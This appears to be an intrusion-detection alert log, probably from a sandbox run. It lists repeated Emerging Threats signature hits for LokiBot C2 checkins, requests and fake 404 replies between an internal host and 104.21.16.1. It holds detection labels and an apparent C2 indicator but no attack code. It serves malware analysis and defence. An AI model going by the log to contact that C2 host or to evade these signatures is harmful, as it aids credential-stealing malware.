2025-03-06T04:05:47.164818+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59251	104.21.16.1	80	TCP
2025-03-06T04:05:48.954382+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59256	104.21.16.1	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T04:03:53.206639+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49714	TCP
2025-03-06T04:03:55.128414+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49720	TCP
2025-03-06T04:03:57.153017+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49726	TCP
2025-03-06T04:04:00.981839+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49737	TCP
2025-03-06T04:04:02.979119+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49742	TCP
2025-03-06T04:04:05.048261+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49749	TCP
2025-03-06T04:04:08.920417+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49761	TCP
2025-03-06T04:04:10.832410+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49766	TCP
2025-03-06T04:04:12.623158+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49768	TCP
2025-03-06T04:04:20.463127+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49790	TCP
2025-03-06T04:04:22.379707+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49793	TCP
2025-03-06T04:04:26.196280+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	49805	TCP
2025-03-06T04:04:29.994388+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59051	TCP
2025-03-06T04:04:32.116545+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59055	TCP
2025-03-06T04:04:34.040572+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59060	TCP
2025-03-06T04:04:35.973703+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59066	TCP
2025-03-06T04:04:38.081835+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59071	TCP
2025-03-06T04:04:40.014611+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59077	TCP
2025-03-06T04:04:41.963221+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59081	TCP
2025-03-06T04:04:43.899531+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59086	TCP
2025-03-06T04:04:45.898203+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59091	TCP
2025-03-06T04:04:49.804375+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59102	TCP
2025-03-06T04:04:51.836152+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59107	TCP
2025-03-06T04:04:53.749776+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59111	TCP
2025-03-06T04:04:57.741257+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59121	TCP
2025-03-06T04:04:59.684920+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59127	TCP
2025-03-06T04:05:01.627898+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59131	TCP
2025-03-06T04:05:03.589656+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59136	TCP
2025-03-06T04:05:05.610256+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59142	TCP
2025-03-06T04:05:13.221706+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59161	TCP
2025-03-06T04:05:15.159966+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59167	TCP
2025-03-06T04:05:17.004937+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59171	TCP
2025-03-06T04:05:20.847807+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59181	TCP
2025-03-06T04:05:22.754441+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59186	TCP
2025-03-06T04:05:28.534571+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59202	TCP
2025-03-06T04:05:34.176973+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59216	TCP
2025-03-06T04:05:40.269512+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59231	TCP
2025-03-06T04:05:44.099082+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59240	TCP
2025-03-06T04:05:47.798850+0100	2025483	1	A Network Trojan was detected	104.21.16.1	80	192.168.2.6	59251	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T04:03:49.277970+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49711	104.21.16.1	80	TCP
2025-03-06T04:03:51.278511+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49713	104.21.16.1	80	TCP
2025-03-06T04:03:53.201624+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49714	104.21.16.1	80	TCP
2025-03-06T04:03:55.123302+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49720	104.21.16.1	80	TCP
2025-03-06T04:03:57.147922+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49726	104.21.16.1	80	TCP
2025-03-06T04:03:59.026601+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49732	104.21.16.1	80	TCP
2025-03-06T04:04:00.976832+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49737	104.21.16.1	80	TCP
2025-03-06T04:04:02.919705+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49742	104.21.16.1	80	TCP
2025-03-06T04:04:05.043190+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49749	104.21.16.1	80	TCP
2025-03-06T04:04:06.955414+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49755	104.21.16.1	80	TCP
2025-03-06T04:04:08.915335+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49761	104.21.16.1	80	TCP
2025-03-06T04:04:10.827213+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49766	104.21.16.1	80	TCP
2025-03-06T04:04:12.615447+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49768	104.21.16.1	80	TCP
2025-03-06T04:04:14.615177+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49774	104.21.16.1	80	TCP
2025-03-06T04:04:16.574300+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49780	104.21.16.1	80	TCP
2025-03-06T04:04:18.464485+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49786	104.21.16.1	80	TCP
2025-03-06T04:04:20.458147+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49790	104.21.16.1	80	TCP
2025-03-06T04:04:22.374598+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49793	104.21.16.1	80	TCP
2025-03-06T04:04:24.265165+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49799	104.21.16.1	80	TCP
2025-03-06T04:04:26.191302+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49805	104.21.16.1	80	TCP
2025-03-06T04:04:28.066550+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49810	104.21.16.1	80	TCP
2025-03-06T04:04:29.989301+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59051	104.21.16.1	80	TCP
2025-03-06T04:04:32.111462+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59055	104.21.16.1	80	TCP
2025-03-06T04:04:34.035641+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59060	104.21.16.1	80	TCP
2025-03-06T04:04:35.968671+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59066	104.21.16.1	80	TCP
2025-03-06T04:04:38.076811+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59071	104.21.16.1	80	TCP
2025-03-06T04:04:40.007493+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59077	104.21.16.1	80	TCP
2025-03-06T04:04:41.958238+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59081	104.21.16.1	80	TCP
2025-03-06T04:04:43.894501+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59086	104.21.16.1	80	TCP
2025-03-06T04:04:45.893186+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59091	104.21.16.1	80	TCP
2025-03-06T04:04:47.864446+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59096	104.21.16.1	80	TCP
2025-03-06T04:04:49.798766+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59102	104.21.16.1	80	TCP
2025-03-06T04:04:51.831104+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59107	104.21.16.1	80	TCP
2025-03-06T04:04:53.744678+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59111	104.21.16.1	80	TCP
2025-03-06T04:04:55.670227+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59116	104.21.16.1	80	TCP
2025-03-06T04:04:57.736115+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59121	104.21.16.1	80	TCP
2025-03-06T04:04:59.679668+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59127	104.21.16.1	80	TCP
2025-03-06T04:05:01.622844+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59131	104.21.16.1	80	TCP
2025-03-06T04:05:03.571742+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59136	104.21.16.1	80	TCP
2025-03-06T04:05:05.605287+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59142	104.21.16.1	80	TCP
2025-03-06T04:05:07.510252+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59147	104.21.16.1	80	TCP
2025-03-06T04:05:09.393749+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59152	104.21.16.1	80	TCP
2025-03-06T04:05:11.269029+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59156	104.21.16.1	80	TCP
2025-03-06T04:05:13.216697+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59161	104.21.16.1	80	TCP
2025-03-06T04:05:15.154899+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59167	104.21.16.1	80	TCP
2025-03-06T04:05:16.999755+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59171	104.21.16.1	80	TCP
2025-03-06T04:05:18.916004+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59176	104.21.16.1	80	TCP
2025-03-06T04:05:20.842730+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59181	104.21.16.1	80	TCP
2025-03-06T04:05:22.749374+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59186	104.21.16.1	80	TCP
2025-03-06T04:05:24.651542+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59191	104.21.16.1	80	TCP
2025-03-06T04:05:26.585069+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59196	104.21.16.1	80	TCP
2025-03-06T04:05:28.528928+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59202	104.21.16.1	80	TCP
2025-03-06T04:05:30.451853+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59206	104.21.16.1	80	TCP
2025-03-06T04:05:32.347939+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59212	104.21.16.1	80	TCP
2025-03-06T04:05:34.171856+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59216	104.21.16.1	80	TCP
2025-03-06T04:05:36.055463+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59221	104.21.16.1	80	TCP
2025-03-06T04:05:38.318964+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59227	104.21.16.1	80	TCP
2025-03-06T04:05:40.264229+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59231	104.21.16.1	80	TCP
2025-03-06T04:05:42.171346+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59237	104.21.16.1	80	TCP
2025-03-06T04:05:44.093985+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59240	104.21.16.1	80	TCP
2025-03-06T04:05:45.983520+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59246	104.21.16.1	80	TCP
2025-03-06T04:05:47.793845+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59251	104.21.16.1	80	TCP
2025-03-06T04:05:49.673289+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	59256	104.21.16.1	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T04:03:45.735358+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49709	104.21.16.1	80	TCP
2025-03-06T04:03:47.665765+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49710	104.21.16.1	80	TCP
2025-03-06T04:03:48.542508+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49711	104.21.16.1	80	TCP
2025-03-06T04:03:50.566688+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49713	104.21.16.1	80	TCP
2025-03-06T04:03:52.446459+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49714	104.21.16.1	80	TCP
2025-03-06T04:03:54.361622+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49720	104.21.16.1	80	TCP
2025-03-06T04:03:56.390014+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49726	104.21.16.1	80	TCP
2025-03-06T04:03:58.316473+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49732	104.21.16.1	80	TCP
2025-03-06T04:04:00.195263+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49737	104.21.16.1	80	TCP
2025-03-06T04:04:02.151058+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49742	104.21.16.1	80	TCP
2025-03-06T04:04:04.265359+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49749	104.21.16.1	80	TCP
2025-03-06T04:04:06.201744+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49755	104.21.16.1	80	TCP
2025-03-06T04:04:08.125482+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49761	104.21.16.1	80	TCP
2025-03-06T04:04:10.062674+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49766	104.21.16.1	80	TCP
2025-03-06T04:04:11.988824+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49768	104.21.16.1	80	TCP
2025-03-06T04:04:13.900262+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49774	104.21.16.1	80	TCP
2025-03-06T04:04:15.812629+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49780	104.21.16.1	80	TCP
2025-03-06T04:04:17.719575+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49786	104.21.16.1	80	TCP
2025-03-06T04:04:19.687413+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49790	104.21.16.1	80	TCP
2025-03-06T04:04:21.613325+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49793	104.21.16.1	80	TCP
2025-03-06T04:04:23.536257+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49799	104.21.16.1	80	TCP
2025-03-06T04:04:25.425745+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49805	104.21.16.1	80	TCP
2025-03-06T04:04:27.347257+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49810	104.21.16.1	80	TCP
2025-03-06T04:04:29.224142+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59051	104.21.16.1	80	TCP
2025-03-06T04:04:31.359423+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59055	104.21.16.1	80	TCP
2025-03-06T04:04:33.266425+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59060	104.21.16.1	80	TCP
2025-03-06T04:04:35.188451+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59066	104.21.16.1	80	TCP
2025-03-06T04:04:37.317190+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59071	104.21.16.1	80	TCP
2025-03-06T04:04:39.236859+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59077	104.21.16.1	80	TCP
2025-03-06T04:04:41.158663+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59081	104.21.16.1	80	TCP
2025-03-06T04:04:43.126252+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59086	104.21.16.1	80	TCP
2025-03-06T04:04:45.054916+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59091	104.21.16.1	80	TCP
2025-03-06T04:04:47.227160+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59096	104.21.16.1	80	TCP
2025-03-06T04:04:49.029554+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59102	104.21.16.1	80	TCP
2025-03-06T04:04:51.034762+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59107	104.21.16.1	80	TCP
2025-03-06T04:04:52.984767+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59111	104.21.16.1	80	TCP
2025-03-06T04:04:54.931565+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59116	104.21.16.1	80	TCP
2025-03-06T04:04:56.957167+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59121	104.21.16.1	80	TCP
2025-03-06T04:04:58.912947+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59127	104.21.16.1	80	TCP
2025-03-06T04:05:00.845623+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59131	104.21.16.1	80	TCP
2025-03-06T04:05:02.800675+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59136	104.21.16.1	80	TCP
2025-03-06T04:05:04.838430+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59142	104.21.16.1	80	TCP
2025-03-06T04:05:06.783994+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59147	104.21.16.1	80	TCP
2025-03-06T04:05:08.672822+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59152	104.21.16.1	80	TCP
2025-03-06T04:05:10.548245+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59156	104.21.16.1	80	TCP
2025-03-06T04:05:12.425406+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59161	104.21.16.1	80	TCP
2025-03-06T04:05:14.378001+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59167	104.21.16.1	80	TCP
2025-03-06T04:05:16.332459+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59171	104.21.16.1	80	TCP
2025-03-06T04:05:18.189655+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59176	104.21.16.1	80	TCP
2025-03-06T04:05:20.069802+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59181	104.21.16.1	80	TCP
2025-03-06T04:05:22.004551+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59186	104.21.16.1	80	TCP
2025-03-06T04:05:23.925500+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59191	104.21.16.1	80	TCP
2025-03-06T04:05:25.862053+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59196	104.21.16.1	80	TCP
2025-03-06T04:05:27.738975+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59202	104.21.16.1	80	TCP
2025-03-06T04:05:29.713587+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59206	104.21.16.1	80	TCP
2025-03-06T04:05:31.626941+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59212	104.21.16.1	80	TCP
2025-03-06T04:05:33.509861+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59216	104.21.16.1	80	TCP
2025-03-06T04:05:35.331358+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59221	104.21.16.1	80	TCP
2025-03-06T04:05:37.592679+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59227	104.21.16.1	80	TCP
2025-03-06T04:05:39.502540+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59231	104.21.16.1	80	TCP
2025-03-06T04:05:41.440392+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59237	104.21.16.1	80	TCP
2025-03-06T04:05:43.331199+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59240	104.21.16.1	80	TCP
2025-03-06T04:05:45.266738+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59246	104.21.16.1	80	TCP
2025-03-06T04:05:47.164818+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59251	104.21.16.1	80	TCP
2025-03-06T04:05:48.954382+0100	2021641	1	A Network Trojan was detected	192.168.2.6	59256	104.21.16.1	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T04:03:45.735358+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49709	104.21.16.1	80	TCP
2025-03-06T04:03:47.665765+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49710	104.21.16.1	80	TCP
2025-03-06T04:03:48.542508+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49711	104.21.16.1	80	TCP
2025-03-06T04:03:50.566688+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49713	104.21.16.1	80	TCP
2025-03-06T04:03:52.446459+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49714	104.21.16.1	80	TCP
2025-03-06T04:03:54.361622+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49720	104.21.16.1	80	TCP
2025-03-06T04:03:56.390014+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49726	104.21.16.1	80	TCP
2025-03-06T04:03:58.316473+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49732	104.21.16.1	80	TCP
2025-03-06T04:04:00.195263+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49737	104.21.16.1	80	TCP
2025-03-06T04:04:02.151058+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49742	104.21.16.1	80	TCP
2025-03-06T04:04:04.265359+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49749	104.21.16.1	80	TCP
2025-03-06T04:04:06.201744+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49755	104.21.16.1	80	TCP
2025-03-06T04:04:08.125482+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49761	104.21.16.1	80	TCP
2025-03-06T04:04:10.062674+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49766	104.21.16.1	80	TCP
2025-03-06T04:04:11.988824+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49768	104.21.16.1	80	TCP
2025-03-06T04:04:13.900262+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49774	104.21.16.1	80	TCP
2025-03-06T04:04:15.812629+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49780	104.21.16.1	80	TCP
2025-03-06T04:04:17.719575+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49786	104.21.16.1	80	TCP
2025-03-06T04:04:19.687413+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49790	104.21.16.1	80	TCP
2025-03-06T04:04:21.613325+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49793	104.21.16.1	80	TCP
2025-03-06T04:04:23.536257+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49799	104.21.16.1	80	TCP
2025-03-06T04:04:25.425745+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49805	104.21.16.1	80	TCP
2025-03-06T04:04:27.347257+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49810	104.21.16.1	80	TCP
2025-03-06T04:04:29.224142+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59051	104.21.16.1	80	TCP
2025-03-06T04:04:31.359423+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59055	104.21.16.1	80	TCP
2025-03-06T04:04:33.266425+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59060	104.21.16.1	80	TCP
2025-03-06T04:04:35.188451+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59066	104.21.16.1	80	TCP
2025-03-06T04:04:37.317190+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59071	104.21.16.1	80	TCP
2025-03-06T04:04:39.236859+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59077	104.21.16.1	80	TCP
2025-03-06T04:04:41.158663+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59081	104.21.16.1	80	TCP
2025-03-06T04:04:43.126252+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59086	104.21.16.1	80	TCP
2025-03-06T04:04:45.054916+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59091	104.21.16.1	80	TCP
2025-03-06T04:04:47.227160+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59096	104.21.16.1	80	TCP
2025-03-06T04:04:49.029554+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59102	104.21.16.1	80	TCP
2025-03-06T04:04:51.034762+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59107	104.21.16.1	80	TCP
2025-03-06T04:04:52.984767+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59111	104.21.16.1	80	TCP
2025-03-06T04:04:54.931565+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59116	104.21.16.1	80	TCP
2025-03-06T04:04:56.957167+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59121	104.21.16.1	80	TCP
2025-03-06T04:04:58.912947+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59127	104.21.16.1	80	TCP
2025-03-06T04:05:00.845623+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59131	104.21.16.1	80	TCP
2025-03-06T04:05:02.800675+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59136	104.21.16.1	80	TCP
2025-03-06T04:05:04.838430+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59142	104.21.16.1	80	TCP
2025-03-06T04:05:06.783994+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59147	104.21.16.1	80	TCP
2025-03-06T04:05:08.672822+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59152	104.21.16.1	80	TCP
2025-03-06T04:05:10.548245+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59156	104.21.16.1	80	TCP
2025-03-06T04:05:12.425406+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59161	104.21.16.1	80	TCP
2025-03-06T04:05:14.378001+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59167	104.21.16.1	80	TCP
2025-03-06T04:05:16.332459+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59171	104.21.16.1	80	TCP
2025-03-06T04:05:18.189655+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59176	104.21.16.1	80	TCP
2025-03-06T04:05:20.069802+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59181	104.21.16.1	80	TCP
2025-03-06T04:05:22.004551+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59186	104.21.16.1	80	TCP
2025-03-06T04:05:23.925500+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59191	104.21.16.1	80	TCP
2025-03-06T04:05:25.862053+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59196	104.21.16.1	80	TCP
2025-03-06T04:05:27.738975+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59202	104.21.16.1	80	TCP
2025-03-06T04:05:29.713587+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59206	104.21.16.1	80	TCP
2025-03-06T04:05:31.626941+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59212	104.21.16.1	80	TCP
2025-03-06T04:05:33.509861+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59216	104.21.16.1	80	TCP
2025-03-06T04:05:35.331358+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59221	104.21.16.1	80	TCP
2025-03-06T04:05:37.592679+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59227	104.21.16.1	80	TCP
2025-03-06T04:05:39.502540+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59231	104.21.16.1	80	TCP
2025-03-06T04:05:41.440392+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59237	104.21.16.1	80	TCP
2025-03-06T04:05:43.331199+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59240	104.21.16.1	80	TCP
2025-03-06T04:05:45.266738+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	59246	104.21.16.1	80	TCP
